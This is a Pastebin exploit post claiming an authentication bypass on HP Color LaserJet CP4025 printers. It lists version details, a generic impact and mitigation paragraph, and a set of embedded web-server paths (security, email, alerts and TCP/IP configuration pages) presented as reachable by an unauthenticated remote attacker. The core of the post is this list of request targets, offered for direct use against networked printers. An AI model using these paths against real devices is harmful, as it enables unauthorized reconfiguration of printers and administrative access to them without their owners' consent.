Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ############################################################################################
- # Exploit Title : HP Color LaserJet CP4025 Printers 6.7.0.x Bypass Missing Authentication
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 31/03/2019
- # Vendor Homepage : hp.com
- # Software Information Link :
- support.hp.com/us-en/drivers/selfservice/hp-color-laserjet-enterprise-cp4025-printer-series/3965792
- # Software Version :
- Driver-Universal Print Driver => 6.1.0.20062 and 6.7.0.23989
- Driver-Universal Print Driver for Managed Services => Version 6.7.0.23989
- Example Printer Model Number => CC490A - CCXXXA
- Basic Drivers => 61.155.01.16418
- Driver-USB => Version 7.0.0.29
- Firmware => Version 07.250.2 - 20150120 07.171.9
- Software Universal Printer Driver => Version 1.8.6
- Utility => Version 1.0
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # CVE : CVE-2008-4419
- # Vulnerability Type : CWE-306 [ Missing Authentication for Critical Function ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ############################################################################################
- # Description about Software :
- ***************************
- HP LaserJet as a brand name identifies the line of dry electrophotographic DEP laser printers marketed by the American
- computer company Hewlett-Packard (HP). The HP LaserJet was the world's first desktop laser printer.
- ############################################################################################
- # Impact :
- ***********
- The software does not perform any authentication for functionality that requires a provable user identity
- or consumes a significant amount of resources.
- The vulnerability allows a remote unauthenticated attacker to send specially crafted HTTP request to the
- affected application and change configuration settings or gain administrative access.
- Missing authentication for critical function is a language independent issue that can appear in any multiuser environment.
- Developing a fix would require understanding of the current application security model and implemented access controls.
- Three basic rules however can help you eliminate potential improper authorization issues:
- 1) Identify all privileged assets within your application (web pages that display sensitive data,
- website sections that contain privileged/administrative functionality, etc.)
- 2) Identify user roles within the application and their access permissions
- 3) Always check if the user should have privileges to access the asset
- ############################################################################################
- # Bypass Missing Authentication Exploit / Vulnerability :
- *************************************************
- /hp/device/this.LCDispatcher
- /hp/device/this.LCDispatcher?nav=hp.EmailServer
- /hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=1&lstid=-1
- /hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=3&lstid=1
- /hp/device/this.LCDispatcher?nav=hp.Alerts
- /hp/device/this.LCDispatcher?nav=hp.AutoSend
- /hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0
- /hp/device/this.LCDispatcher?nav=hp.OtherLinks
- /hp/device/this.LCDispatcher?nav=hp.Config
- /hp/device/this.LCDispatcher?nav=hp.DeviceInfoConfig
- /config_pro.htm
- /tcpipv6.htm
- /tcpipv4.htm
- /tcp_param.htm
- /network_id.htm
- /tcp_summary.htm
- /index_info.htm
- /support_param.html
- /support.htm
- /tcp_diag.htm
- /configpage.htm
- /tcp_param.htm
- /network_id.htm
- ############################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement